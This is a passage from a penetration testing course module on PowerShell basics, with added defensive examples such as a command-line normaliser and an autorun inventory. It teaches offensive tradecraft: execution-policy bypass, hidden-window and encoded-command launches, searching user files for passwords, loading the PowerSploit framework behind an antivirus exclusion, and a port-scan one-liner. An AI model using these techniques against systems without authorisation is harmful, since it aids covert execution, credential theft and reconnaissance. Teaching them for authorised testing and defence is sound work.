Section 3 Module 2 PowerShell Fundamentals

2.1 The PowerShell CLI
2.2 Cmdlets
2.3 Modules
2.4 Scripts
2.5 Objects
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
By the end of this module, you should have a better understanding of:

✓ The PowerShell command line interface (CLI) and accessing various cmdlets and modules.
✓ Some of the more common PowerShell features and components as they relate to penetration testing.

2.1 The PowerShell CLI
For our first task, we should become familiar with the PowerShell Command Line Interface (CLI).

http://radar.oreilly.com/2013/06/powershell-command-line-introduction.html

The PowerShell CLI provides us with access to built-in cmdlets, modules, functions and features, and provides a way to create tasks, functions, variables and more interactively, directly from the CLI.
In most cases, accessing the CLI is as simple as typing “powershell” in the Windows search field from the Start Menu.

Alternatively, the shortcut to PowerShell can be found within the “%appdata%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell” directory.

In case the shortcuts are unavailable, the PowerShell executable itself can be found in the “C:\Windows\System32\WindowsPowerShell\v1.0” directory. If other versions are available on the system, they can be found in their corresponding version paths.


A note regarding 32-bit and 64-bit PowerShell executables:

If you’re operating on a 64-bit system, the 64-bit PowerShell executable can be found in C:\windows\system32\WindowsPowerShell, while the 32-bit version is located in the C:\windows\SysWOW64\WindowsPowerShell directory. This can be a bit confusing considering the directory naming convention.

Nonetheless, we can determine whether we’re running in a 32-bit or 64-bit PowerShell environment from the CLI with the following command, which should return “True” if the current PowerShell process is 64-bit:

PS C:\> [Environment]::Is64BitProcess

On a 32-bit system, the executable will be in its usual location of:

C:\Windows\System32\WindowsPowerShell\*


When possible, we should try to launch PowerShell as the Administrator user, as this will give us access to functions which we would otherwise be unable to access as a lower-privileged user. We can right-click on the shortcut or executable and select “Run As Administrator.”

NOTE

Although our examples are shown on Windows 10, all of the steps will be similar for Windows 7 and other versions of Windows, unless otherwise noted.


Once we launch PowerShell, we’re presented with the familiar blue console.

Like most other programs found on Windows, the PowerShell executable has its own set of command line options. We can view these options with the usual “/?” help parameter. These options can alternatively be shown with the “-Help” or “-?” parameter as well, and will be most useful when we’re calling PowerShell from a standard Windows command prompt (cmd.exe).


The following are some of the more common PowerShell.exe command line parameters we will use for our purposes:

-ExecutionPolicy

The PowerShell execution policy determines which scripts, if any, we can run, and can easily be disabled with the “Bypass” or “Unrestricted” arguments.

C:\> powershell.exe -ExecutionPolicy Bypass .\script.ps1
C:\> powershell.exe -ExecutionPolicy Unrestricted .\script.ps1


-WindowStyle

The -WindowStyle parameter hides the PowerShell window when used with the “Hidden” argument.

C:\> powershell.exe -WindowStyle Hidden .\script.ps1


-Command

The -Command parameter is used to specify a command or script block to run.

C:\> powershell.exe -Command Get-Process
C:\> powershell.exe -Command "& { Get-EventLog -LogName security }"

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_script_blocks?view=powershell-6


-EncodedCommand

The -EncodedCommand parameter is used to execute base64 encoded scripts or commands.

C:\> powershell.exe -EncodedCommand $encodedCommand


-NoProfile

Don’t load any PowerShell profiles. Profiles are essentially scripts that run when the PowerShell executable is launched and can interfere with our operations.

C:\> powershell.exe -NoProfile .\script.ps1


-Version

We can use the -Version parameter followed by a version number as the argument to downgrade the version of PowerShell.
• Useful in scenarios where you’ve landed on a machine with a more recent version and need to downgrade to Version 1.0 or 2.0 to complete certain tasks.
• Requires that older versions are still installed on the target.

C:\> powershell.exe -Version 2


Furthermore, all of the PowerShell.exe command line parameters, as well as their arguments, can also be abbreviated, as long as the abbreviations are unique; in addition, they are not case-sensitive:

-ExecutionPolicy Bypass    powershell.exe -ep Bypass    powershell.exe -ex by
-EncodedCommand            powershell.exe -enco         powershell.exe -ec
-WindowStyle Hidden        powershell.exe -W h          powershell.exe -Wi hi

We will cover more of the PowerShell.exe command line options a bit later in modules that follow.
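Because the same launch can be written many ways, anyone reviewing process-creation logs needs to normalise it first. The following function is an added example (not from the course material) that expands abbreviated powershell.exe parameters to their full names and decodes an -EncodedCommand argument; the minimum-prefix table is an assumption based on how the powershell.exe host parses its switches, and the sample command lines are constructed.

```powershell
# Added example (not from the course slides): normalise a powershell.exe command
# line as a log reviewer would see it. Abbreviated, case-insensitive parameters
# are expanded to their full names and any -EncodedCommand payload is decoded,
# so that "-ep Bypass -W h -ec <base64>" and its long form are reported the same.

# Canonical names of the parameters covered in this module, each with the
# shortest prefix powershell.exe accepts for it (assumed from the host's
# behaviour, e.g. -e for -EncodedCommand, -ex for -ExecutionPolicy).
$ParamTable = [ordered]@{
    'EncodedCommand'  = 'e'
    'ExecutionPolicy' = 'ex'
    'WindowStyle'     = 'w'
    'Command'         = 'c'
    'NoProfile'       = 'nop'
    'Version'         = 'v'
}
# Two-letter forms the host also accepts that are not plain prefixes
$ParamAliases = @{ 'ep' = 'ExecutionPolicy'; 'ec' = 'EncodedCommand' }

function Resolve-PsParameter {
    # Returns the canonical parameter name for a token such as -ep, -W or /nop,
    # or $null when the token is not a recognised parameter.
    param([string]$Token)
    $key = $Token.TrimStart('-', '/').ToLowerInvariant()
    if ($key.Length -eq 0) { return $null }
    if ($ParamAliases.ContainsKey($key)) { return $ParamAliases[$key] }
    foreach ($name in $ParamTable.Keys) {
        $minimum = $ParamTable[$name]
        if ($key.Length -ge $minimum.Length -and $name.ToLowerInvariant().StartsWith($key)) {
            return $name
        }
    }
    return $null
}

function Expand-PsCommandLine {
    # Splits on whitespace (quoted -Command bodies are not re-joined here),
    # expands parameter tokens and decodes the -EncodedCommand argument.
    param([Parameter(Mandatory = $true)][string]$CommandLine)
    $tokens = @($CommandLine -split '\s+' | Where-Object { $_ -ne '' })
    $normalised = New-Object System.Collections.Generic.List[string]
    $flags = New-Object System.Collections.Generic.List[string]
    $decoded = $null

    for ($i = 0; $i -lt $tokens.Count; $i++) {
        $token = $tokens[$i]
        $param = $null
        if ($token -match '^[-/]') { $param = Resolve-PsParameter -Token $token }
        if (-not $param) {
            $normalised.Add($token)
            continue
        }
        $flags.Add($param)
        $normalised.Add("-$param")
        if ($param -eq 'EncodedCommand' -and $i + 1 -lt $tokens.Count) {
            # The argument is base64 of the UTF-16LE script text
            $i++
            $normalised.Add($tokens[$i])
            try {
                $bytes = [Convert]::FromBase64String($tokens[$i])
                $decoded = [Text.Encoding]::Unicode.GetString($bytes)
            } catch {
                $decoded = '<argument is not valid base64>'
            }
        }
    }

    [pscustomobject]@{
        Original   = $CommandLine
        Normalised = ($normalised -join ' ')
        Flags      = ($flags -join ',')
        Decoded    = $decoded
    }
}

# Constructed sample command lines (the encoded one wraps a harmless Get-Process)
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('Get-Process'))
$samples = @(
    'powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile .\script.ps1',
    'POWERSHELL.EXE -ep Bypass -W h -nop .\script.ps1',
    "powershell.exe -nop -ec $encoded",
    'powershell.exe -v 2 -c Get-Process'
)
$samples | ForEach-Object { Expand-PsCommandLine -CommandLine $_ } | Format-List
```

The first two samples normalise to the same Flags value, which is what a detection rule should key on rather than the literal spelling of the switches.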


An extremely useful feature of the PowerShell CLI is the “Get-Help” cmdlet. Similar to *nix “man pages,” we can call upon the “Get-Help” command to obtain information related to any function, alias, module or cmdlet that PowerShell is aware of.

https://technet.microsoft.com/en-us/library/cc764318.aspx

We do this by including the name of the cmdlet, function or module we’re looking for information on as an argument to the “Get-Help” cmdlet. Here we request the PowerShell help pages for the “Get-Help” cmdlet itself.


To get “full” help for any cmdlet, which includes detailed information on associated parameters, we can use the -Full parameter:

PS C:\> Get-Help Get-Process -Full

And if we’d like to get examples on how to use a specific cmdlet, we can use the “-Examples” parameter:

PS C:\> Get-Help Get-Process -Examples


Alternatively, if we want the current help pages from online for any of the cmdlets or functions, we can simply supply the -Online parameter to our command line, which will launch a web browser to the corresponding help page:

PS C:\> Get-Help Get-Help -Online

If we’d like to update our locally installed help files for PowerShell via the CLI, we can do so with the “Update-Help” cmdlet.

More information on using the “Get-Help” cmdlet can be found here:

https://technet.microsoft.com/en-us/library/cc764318.aspx


The “Get-Command” cmdlet is another very useful one. It allows us to list all cmdlets, aliases, functions, workflows, filters, scripts and any applications that are available for us to use in PowerShell.

Running the “Get-Command” cmdlet without arguments will simply list all commands, but we can also use the -Name parameter to list any that are useful to us. For instance, we can list all functions related to modification of the Windows Firewall with the following command:

PS C:\> Get-Command -Name *Firewall*


2.2 Cmdlets

As we’ve seen in the previous section, cmdlets (“command-lets”) are a big part of how we will leverage PowerShell for our offensive purposes, two of which we’ve already briefly covered:
• “Get-Help”
• “Get-Command”

https://msdn.microsoft.com/en-us/library/ms714395(v=vs.85).aspx

Next, we’ll cover some of the ways we can leverage other useful cmdlets for our purposes.


Let’s first generally summarize what cmdlets are:
• Light-weight PowerShell scripts that perform a single function (can be as small as a few lines of code).
• Instances of .NET Framework classes derived from the Cmdlet base class that provide access to system functions.
• Cmdlets are native commands in PowerShell (we can also create our own).
• Typically written in a “Verb-Noun” naming format which helps us determine their function (e.g., Invoke-Command).
• Typically used to return output to other cmdlets to be then processed via a pipeline (|).

https://msdn.microsoft.com/en-us/library/gg145045(v=vs.110).aspx
https://docs.microsoft.com/en-us/dotnet/api/system.management.automation.cmdlet?redirectedfrom=MSDN&view=powershellsdk-1.1.0
https://www.petri.com/understanding-the-powershell-pipeline

Every cmdlet has its own set of parameters which can be discovered through the Get-Help cmdlet, as we’ve seen previously.


IMPORTANT

It should be noted that most cmdlets, by default, when run without other parameters, will return a limited set of information or “columns.”

For example, just running the “Get-ChildItem” cmdlet without any other arguments or options returns four columns named “Mode,” “LastWriteTime,” “Length” and “Name”.

But by piping the output of a cmdlet to the “Format-List” cmdlet, rather than the columns and names seen in the default output, we can return all named properties associated with its objects in a list-like format:

PS C:\> Get-ChildItem | Format-List *

https://technet.microsoft.com/en-us/library/hh750381.aspx

These names, whether in list format or the default column format, are important, as we can use them to filter the output of cmdlet objects for specific properties, as we’ll see shortly.


The results of all cmdlet output are usually referred to as “objects.” These objects can be further processed using what is known as “pipelining,” similar to how we can chain commands together in a Linux bash shell, for instance, with the pipe operator (|).

https://www.petri.com/understanding-the-powershell-pipeline

An example of this processing of cmdlet output objects with pipelines would be something like the following:

PS C:\> Get-Process | Sort-Object -Unique | Select-Object ProcessName

The above returns a list of processes (Get-Process), then sorts the list (Sort-Object) with the -Unique parameter, and finally selects the “ProcessName” property (Select-Object ProcessName), returning a unique list of process names.

We can also redirect the results of our pipeline operation to a file using a standard redirect operator (>):

PS C:\> Get-Process | Sort-Object -Unique | Select-Object ProcessName > uniq_procs.txt

Let’s now examine several examples of cmdlet usage we’ll find useful for our work.


The Get-Process cmdlet will give us a listing of all processes, as we saw in a previous example. Running the “Get-Process” cmdlet without any arguments returns basic information, formatted as a table which includes column names (properties).

To get all of the information (properties) associated with all of the processes, we can pipe it to the “Format-List” cmdlet with the wildcard argument (*). This will give us a better idea of how we can filter the data for specific properties.

PS C:\> Get-Process | Format-List *


We can further extend this to get information about specific processes and the paths to their executables (in this example, Chrome and Firefox), by using the “Format-List” cmdlet and also specifying the “Path” property name:

PS C:\> Get-Process chrome, firefox | Sort-Object -Unique | Format-List Path

We can also append multiple property names to the Format-List cmdlet, and obtain the processes’ paths and associated PIDs (Id), for instance:

PS C:\> Get-Process chrome, firefox | Sort-Object -Unique | Format-List Path,Id


Something that’s good to know about cmdlets is that most of them have “aliases.” For instance, the “Get-ChildItem” cmdlet, which simply lists items in a directory, can alternatively be called by issuing the “ls” command, which is an alias for the Get-ChildItem cmdlet. We would get the same exact results by simply running “Get-ChildItem.”

To find the aliases for a specific cmdlet, we can use the “Get-Alias” cmdlet with the “-Definition” parameter followed by a cmdlet name, as in the following example:

PS C:\Users> Get-Alias -Definition Get-ChildItem

As we can see, the “Get-ChildItem” cmdlet has three aliases: “dir,” “gci,” and “ls.”
Another alias you’ll see quite often is “select”, used in conjunction with other cmdlets in pipeline operations; it is an alias for the “Select-Object” cmdlet.

In this example, we’re using the “Get-WmiObject” cmdlet (used to return information about WMI objects) with the “-class win32_operatingsystem” parameter and argument, and then selecting (select) all (*) properties related to that WMI object class; this returns all information related to the current operating system:

PS C:\> Get-WmiObject -class win32_operatingsystem | select -Property *

Alternatively, we could use the Format-List alias “fl” with the wildcard argument, and obtain the same list of all properties for the WMI object:

PS C:\> Get-WmiObject -class win32_operatingsystem | fl *


We can use the Get-WmiObject cmdlet to obtain information regarding any WMI class, for instance getting a detailed list of properties for all services with the “win32_service” class:

PS C:\> Get-WmiObject -class win32_service | Format-List *

And we can further extend our pipeline and filtering operation to give us just “PathName”, which includes the command line arguments and paths to all service executables:

PS C:\> Get-WmiObject -class win32_service | Sort-Object -Unique PathName | fl PathName


And of course, saving the information we’re gathering to a file is important as well. We can either redirect the output of the pipeline operation to a file with the (>) redirect operator, as we saw in an earlier example, or, when we need the results in a different format for processing, pipe the output to the “Export-Csv” cmdlet and save the results in CSV format. Note that the objects themselves must reach Export-Csv; piping the output of Format-List (fl) into it would only export formatting records, so Select-Object is used to expand all properties instead:

PS C:\> Get-WmiObject -class win32_operatingsystem | Select-Object * | Export-Csv C:\host_info.csv


For access to Windows Registry hives, PowerShell provides a convenient method with the following command:

PS C:\> cd HKLM:\

We can easily navigate into areas we might be interested in with “cd,” which is the alias for “Set-Location,” and furthermore list the contents of our current hive with the “Get-ChildItem” cmdlet or “ls”:

PS HKLM:\> cd .\SOFTWARE\Microsoft\Windows\CurrentVersion\
PS HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\> ls
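The CurrentVersion key navigated to above also holds the Run and RunOnce autostart lists, which are among the first places a host review looks for persistence. The following is an added example (not from the course slides) that uses the registry provider to inventory those values for both HKLM: and HKCU:; the list of keys and the user-writable-path pattern are my own choices for the illustration.

```powershell
# Added example (not from the course slides): use the registry provider shown
# above to inventory the autostart entries under CurrentVersion\Run for both the
# machine hive (HKLM:) and the current user's hive (HKCU:).

$RunKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
)

# Properties Get-ItemProperty adds to every result; everything else is a registry value
$ProviderNoise = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'

function Get-AutorunEntry {
    param([string[]]$Key = $RunKeys)
    foreach ($k in $Key) {
        # Keys that do not exist (e.g. WOW6432Node on 32-bit Windows) are skipped
        if (-not (Test-Path -Path $k)) { continue }
        $values = Get-ItemProperty -Path $k
        foreach ($prop in $values.PSObject.Properties) {
            if ($ProviderNoise -contains $prop.Name) { continue }
            $command = [string]$prop.Value
            [pscustomobject]@{
                Hive         = $k.Split(':')[0]
                Key          = $k
                Name         = $prop.Name
                Command      = $command
                # Entries launched from user-writable locations deserve a closer look
                UserWritable = ($command -match '\\(AppData|Temp|Users\\Public)\\')
            }
        }
    }
}

# Flagged entries first, then the rest alphabetically
Get-AutorunEntry |
    Sort-Object -Property @{ Expression = 'UserWritable'; Descending = $true }, Name |
    Format-Table Hive, Name, UserWritable, Command -AutoSize
```

Reading HKLM: needs no elevation, so this inventory runs from a standard user console; writing to it would not.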


The Select-String cmdlet, along with the “-Path” and “-Pattern” arguments, is yet another useful PowerShell command we can use to scour the system for files containing certain strings.

In the example below, we search for files with a .txt extension within a user's “Documents” directory containing the string “pass*” in their contents:

PS C:\> Select-String -Path C:\users\user\Documents\*.txt -Pattern pass*

We can then use the “Get-Content” cmdlet to display the full contents of the “passwords.txt” file:

PS C:\> Get-Content C:\Users\user\Documents\passwords.txt

Alternatively, we can obtain the same results by using the “Get-ChildItem” cmdlet alias with the recurse parameter (ls -r), which lists files within a directory recursively, restricting the results to files with the “-File” parameter and the *.txt filter. We then pipe that to the “ForEach-Object” alias (%) and a script block {} that searches for the string “pass*” in each file, using $_ (the variable for the current value in the pipeline) as the path and the alias for the “Select-String” cmdlet (sls):

PS C:\> ls -r C:\users\user\Documents -File *.txt | % {sls -Path $_ -Pattern pass* }

We will learn more about how we can use the “ForEach-Object” cmdlet a bit later for certain tasks.


The “Get-Service” cmdlet will get us information regarding currently installed services and can be useful in the case we can identify a service which might be vulnerable to a privilege escalation exploit. Running it without parameters or arguments simply returns a three-column list of all services:

PS C:\> Get-Service

We can extend those results, as we’ve seen before, with the “Sort-Object” cmdlet. In this example, all services starting with “s” are sorted by the “Status” property in descending order:

PS C:\> Get-Service "s*" | Sort-Object Status -Descending

As we can see, there are many ways and variations of using cmdlets, pipelines and aliases we can leverage to conduct tasks that are relevant to our objectives, and different ways to craft commands we can use to achieve similar results.


2.3 Modules

A module, in simplest terms, is a set of PowerShell functionalities grouped together in the form of a single file that will typically have a “.psm1” file extension.

https://msdn.microsoft.com/en-us/library/dd878324(v=vs.85).aspx

Modules are typically comprised of several components. However, not all components are necessary for the functionality of a module.


The components that can make up a typical module are:
• Any number of PowerShell scripts (.ps1) or other code files, such as a managed cmdlet assembly.
• Additional assemblies, help files, or scripts.
• A module manifest file.
• A directory which is used to contain all of the above.

https://msdn.microsoft.com/en-us/library/dd878337(v=vs.85).aspx

There are also several different types of modules:
• Script modules (we’ll be working with these for the most part)
• Binary modules
• Manifest modules
• Dynamic modules (created dynamically by scripts using the “New-Module” cmdlet)

https://msdn.microsoft.com/en-us/library/dd878340(v=vs.85).aspx
https://docs.microsoft.com/en-us/powershell/module/Microsoft.PowerShell.Core/New-Module?view=powershell-5.1
https://msdn.microsoft.com/en-us/library/dd878342(v=vs.85).aspx
https://msdn.microsoft.com/en-us/library/dd878337(v=vs.85).aspx


Modules are typically “imported” into the current PowerShell session. To obtain a list of all currently imported modules, we can use the “Get-Module” cmdlet. In the example below, we can see all of the currently imported modules for the current PowerShell session:

PS C:\> Get-Module

We can also list all modules available to us for importing with the “-ListAvailable” parameter, which returns a long list of available modules:

PS C:\> Get-Module -ListAvailable

As we’ve mentioned, modules that we want to use will first need to be imported into our current PowerShell session. This can be done with the “Import-Module” cmdlet, as follows:

PS C:\> Import-Module .\module.psm1

Once we import a PowerShell module, all of its various cmdlets and other components become available to us, and we can then simply execute the cmdlets that are part of the module.


As an example, let’s take a quick look at the popular PowerShell exploitation framework “PowerSploit”, and how we would go about importing all of its functionality into our current PowerShell session. Its usage and installation is straightforward, and we should be able to get it up and running in just a few steps.

First, we download the PowerSploit package to our local machine from the following location:

https://github.com/PowerShellMafia/PowerSploit/archive/master.zip

The PowerSploit modules will need to be copied into one of the module paths specified by the “$Env:PSModulePath” PowerShell environment variable. To find these paths, simply type the variable name into your PowerShell console:

PS C:\> $Env:PSModulePath

For our purposes, we’ll use the local user’s module path, which is:

C:\users\user\Documents\WindowsPowerShell\Modules

We’ll then need to create a “PowerSploit” folder in our chosen Modules directory, into which we will copy all of the contents of the PowerSploit archive.


Important note on PowerSploit and Antivirus

Many exploitation frameworks will be detected as “hacking tools” or by other signatures by a number of antivirus solutions. This is somewhat “normal”; it’s antivirus just doing its job, in this case detecting strings within the PowerShell scripts as malicious, or flagging on names of modules, etc. Either way, you can create an exclude directory for your AV software for the purpose of this lesson, and download the modules into that directory for now.

Once we’ve downloaded the PowerSploit archive, extracted it and copied all of its contents into a folder called “PowerSploit” in our chosen module directory, we can then launch a PowerShell console.

We can then import all of the PowerSploit modules into our current session with the Import-Module cmdlet, and if we run the “Get-Module” cmdlet, we can see it’s now included in our list of currently imported modules:

PS C:\> Import-Module PowerSploit
PS C:\> Get-Module

To list all of the PowerSploit associated cmdlets (of which there are many), we can use the “Get-Command” cmdlet, and specify the PowerSploit module with the -Module parameter:

PS C:\> Get-Command -Module PowerSploit

Furthermore, there are help files for all of the modules. For help on a specific PowerSploit cmdlet, we simply run the Get-Help cmdlet, for instance, getting help on the “Write-HijackDLL” PowerSploit cmdlet:

PS C:\> Get-Help Write-HijackDLL

We will cover other modules we can use for our offensive purposes in sections that follow.


2.4 Scripts

Scripts are another element of our leveraging of PowerShell as an offensive tool, and most of the time this is probably the most common way we will utilize PowerShell for most tasks.

PowerShell scripts are usually identified by the “.ps1” extension, the “1” indicating not the version of PowerShell, but rather the version of the PowerShell engine. For the most part, we’ll be dealing with the .ps1 file.

PowerShell scripts can contain as little as a few commands to automate some tasks, or be complex enough to contain parameters, script arguments, loops, functions, and anything else related to the capabilities that PowerShell offers as a scripting language.

Running a PowerShell script is as simple as calling it from the PowerShell console, using the .\ (dot-backslash) notation for a script in our current directory*:

PS C:\> .\example.ps1

* You may have to bypass the current execution policy (as shown earlier) before you execute the script of your choosing.


A very basic example of a PowerShell script which takes a file name as an argument would be something like the following:

example.ps1

The above script simply takes a file name as an argument, for which it creates a variable called “$file,” and runs the “Get-Content” cmdlet on our variable.
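The listing of example.ps1 on the slide did not survive extraction; the following is a reconstruction from the description above (added here, not the course's original file). It keeps the mandatory $file parameter and the Get-Content call exactly as described, and adds a Test-Path check that the description does not mention.

```powershell
# example.ps1, reconstructed from the slide's description (the original listing
# did not survive extraction). One mandatory file name is bound to $file and the
# file is printed with Get-Content; the Test-Path guard is an addition.
param(
    [Parameter(Mandatory = $true, Position = 0,
               HelpMessage = 'Path of the file to display, e.g. users.txt')]
    [ValidateNotNullOrEmpty()]
    [string]$file
)

# Fail clearly on a typo instead of letting Get-Content emit its own error
if (-not (Test-Path -LiteralPath $file -PathType Leaf)) {
    Write-Error "File not found: $file"
    exit 1
}

Get-Content -LiteralPath $file
```

Run as .\example.ps1 users.txt it prints the file; run with no argument, Mandatory = $true makes PowerShell prompt for $file, which is the behaviour the next slides walk through.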


Now if we run this script while supplying the name of a file, in this case “users.txt”, which contains several usernames, we can see what happens.

If we run the script without arguments, PowerShell will ask us for the file, since “mandatory=$true” has been set for the parameter in our script. At that point, we provide our file name, and the script works as intended, returning to us the contents of the users.txt file.

Alternatively, in regard to the example above, rather than writing a .ps1 script file, we could also just create a variable “$file” for our users.txt file, and then call the “Get-Content” cmdlet against our variable, directly from the shell:

PS C:\Users\user\Desktop> $file="users.txt"
PS C:\Users\user\Desktop> Get-Content $file


PowerShell supports several “loop statements” which we can utilize for different tasks. As we saw with a previous example of the “ForEach-Object” cmdlet, we can use loop statements to iterate through files, PowerShell object collections, and even conduct port scans, which we will cover in this section.

A “loop” is a programming or scripting construct which iterates a statement, or condition, based on specific boundaries. In other words, a loop will repeatedly execute the code in its body until a conditional statement returns “False” or returns no additional data.

PowerShell allows us to use a number of loop statements for our purposes:

• for()
• foreach()
• while()
• do {something} while()
• do {something} until()

And as with mostly everything in PowerShell, we can get help on any of those statements with the “Get-Help” cmdlet:

PS C:\> Get-Help about_Foreach
PS C:\> Get-Help about_For
PS C:\> Get-Help about_Do
PS C:\> Get-Help about_While


Loops are generally divided into two parts, a loop statement, and a
loop body and will also contain variables as seen in the example
below:
Loop Statement Loop Body

PS C:\> $services = Get-Service


PS C:\> foreach ($service in $services) { $service.Name }


In the first line, we're creating a variable called "$services" which holds the
collection of objects returned by running the "Get-Service" cmdlet.

We then use the "foreach()" loop statement to create a new variable "$service"
to hold each object of the $services collection in turn, and finally, we're
telling PowerShell to return the name of each $service with the ".Name"
property in the loop body, between the curly braces {}.

Furthermore, we can use several built-in cmdlets for constructing
loop-like pipelines, specifically the "ForEach-Object" and
"Where-Object" cmdlets.

The previous example could be similarly accomplished by using the
"Get-Service" and "ForEach-Object" cmdlets and the pipeline, as
follows:

PS C:\> Get-Service | ForEach-Object {$_.Name}

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/foreach-object?view=powershell-6
https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/where-object?view=powershell-6
The "Where-Object" cmdlet allows us to select objects within a collection based on their
property values, acting as a filter where we would otherwise write a loop. In the following
example, we're using the "Get-ChildItem" cmdlet to list the contents of a "Powershell" directory,
while piping that output to the "Where-Object" cmdlet with the -match comparison operator to
only return files whose name contains "xls":
PS C:\> Get-ChildItem C:\Powershell\ | Where-Object {$_.Name -match "xls"}

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/where-object?view=powershell-6
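Combining the two cmdlets in one pipeline, as an added example not taken from the course: find the PowerShell script files under a directory that changed in the last seven days and record a SHA256 hash of each, a common first step when reviewing scripts that have appeared on a host. The directory C:\Powershell is the slide's; any path works.

```powershell
# Added example, not from the course slides. $root is an assumption (the slide's directory).
$root   = 'C:\Powershell'
$cutoff = (Get-Date).AddDays(-7)

# Where-Object keeps only the objects whose properties match; $_ is the current
# FileInfo object coming down the pipe. ForEach-Object then turns each survivor
# into a small custom object carrying the details we care about.
Get-ChildItem -Path $root -Recurse -File -ErrorAction SilentlyContinue |
    Where-Object { $_.Extension -match '^\.ps(1|m1)$' -and $_.LastWriteTime -gt $cutoff } |
    ForEach-Object {
        [PSCustomObject]@{
            Path     = $_.FullName
            Modified = $_.LastWriteTime
            SHA256   = (Get-FileHash -Path $_.FullName -Algorithm SHA256).Hash
        }
    } |
    Sort-Object -Property Modified -Descending |
    Format-Table -AutoSize
```

The regular expression is anchored on both ends so that "-match" cannot accidentally accept names such as "report.ps1x"; the slide's "xls" example matches anywhere in the name because it is unanchored.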



A great example of a useful loop that uses the "foreach"
statement is a TCP port scanner we can create entirely via the
shell as a one-liner:
PS C:\> $ports=(81,444);$ip="192.168.13.250"; foreach ($port in $ports) {try{$socket=New-Object System.Net.Sockets.TcpClient($ip,$port);} catch{}; if ($socket -eq $null) {echo $ip":"$port" - Closed";}else{echo $ip":"$port" - Open"; $socket = $null;}}



We can just as well put the contents of the above into a
"Scan-Ports.ps1" file, defining the $ports and $ip variables at the
top of the script, for easy execution:

PS C:\Users\user\Desktop> .\Scan-Ports.ps1
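A script version of the check, as an added example that is not the course's Scan-Ports.ps1, which adds the two things the one-liner lacks: a connect timeout (the original blocks until the TCP handshake fails on its own, which on a filtered port can take tens of seconds) and closing of every socket. The address and ports are the slide's values and serve only as constructed input, for instance to verify that a firewall rule really blocks a service.

```powershell
# Added example, not the course's Scan-Ports.ps1. Target values are constructed input.
function Test-TcpPort {
    param(
        [Parameter(Mandatory)][string]$ComputerName,
        [Parameter(Mandatory)][int[]]$Port,
        [int]$TimeoutMs = 1000
    )
    foreach ($p in $Port) {
        $socket = New-Object -TypeName System.Net.Sockets.TcpClient
        try {
            # BeginConnect returns immediately; WaitOne gives us the timeout
            $async = $socket.BeginConnect($ComputerName, $p, $null, $null)
            $done  = $async.AsyncWaitHandle.WaitOne($TimeoutMs)
            if ($done) {
                $socket.EndConnect($async)   # throws if the connection was refused
                $state = 'Open'
            } else {
                $state = 'Filtered/Timeout'  # no answer at all within $TimeoutMs
            }
        } catch {
            $state = 'Closed'                # RST received (SocketException)
        } finally {
            $socket.Close()                  # always release the socket
        }
        [PSCustomObject]@{ Host = $ComputerName; Port = $p; State = $state }
    }
}

Test-TcpPort -ComputerName '192.168.13.250' -Port 81, 444 | Format-Table -AutoSize
```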

Objects are essentially a representation of data that is provided as
a result of running a cmdlet.

Unlike other scripting languages, where data is output as
text most of the time, PowerShell is different in that the data being
output originates from classes within the .NET Framework in the
form of "objects."



Objects are partly comprised of collections of properties, along
with “methods” that we can use to manipulate the objects.



Let’s take the Get-Process cmdlet as an example.

When we run the Get-Process cmdlet along with the "Format-List *"
command, as we've seen earlier, we get a list of all processes
along with their properties.



If we take a look at the "firefox" process object, for example, we
can see it contains a number of different properties (Name, Id,
Path) to name a few.



Each of the objects also has multiple methods that we can use to
manipulate a particular object.

To get a list of methods for objects associated with a cmdlet, we
can use the "Get-Member" cmdlet as part of a pipeline command,
like the following:
PS C:\> Get-Process | Get-Member –MemberType Method



The "Get-Member" cmdlet will give us an idea of all of the methods
for associated objects, as can be seen below for the "Get-Process"
objects.



We can see from the previous output that several methods of the
"Get-Process" objects might be of interest to us, for example "Kill"
or "Start," which we could use to kill or start processes.



So far:

1. We've identified an object (in this case, a process "firefox") we'd
like to manipulate in some way using the "Get-Process" cmdlet.

2. We've determined the methods that are available for use with the
objects that were returned by using the "Get-Process | Get-Member"
cmdlet and pipeline.

3. And we’ve decided that the “Kill” method is the method we’d like
to use for that process (as an example).



The next step is straightforward.

We can simply call the "Get-Process" cmdlet, along with the
"-Name" parameter for the "firefox" process, and pipe that to the
"Kill" method we identified using the "Get-Member" cmdlet.

Our command would look like the following:

PS C:\> Get-Process -Name "firefox" | Kill

Which effectively kills any Firefox processes.
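An added walkthrough, not part of the course, that inspects a process object's members and invokes a method on the object itself; it uses a notepad process we start ourselves so it can be run safely. Note that in the pipeline form above, "kill" is resolved as PowerShell's built-in alias of the Stop-Process cmdlet, whereas calling the object's own Kill method from the member list looks like $p.Kill().

```powershell
# Added example, not from the course slides. Uses a notepad process we start ourselves.
$proc = Start-Process -FilePath notepad.exe -PassThru
Start-Sleep -Seconds 1

# Properties of the object: Name, Id, Path as on the slide, plus many more
$proc | Get-Member -MemberType Property | Select-Object -First 5

# Methods: a few from the same list the slide shows for Get-Process objects
$proc | Get-Member -MemberType Method |
    Where-Object { $_.Name -in @('Kill', 'CloseMainWindow', 'WaitForExit', 'Refresh') }

# Re-fetch the object by Id and invoke a method on it directly
$p = Get-Process -Id $proc.Id
if ($p.Path) { "Running from: $($p.Path)" }
$p.Kill()                      # the object's own method, called with ()
$p.WaitForExit(5000)           # returns True once the process has exited
$p.Refresh()                   # re-read the process state from the OS
"HasExited: $($p.HasExited)"

# Equivalent pipeline form from the slide: 'Kill' here is the alias of Stop-Process
# Get-Process -Name notepad | Kill
```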



This is just one example of how we can manipulate objects using
their associated methods to help us meet our objectives.



In addition to using the built-in cmdlets to access a large number
of objects, which we can then manipulate, we can also create .NET
objects, which greatly extends our capabilities, using the
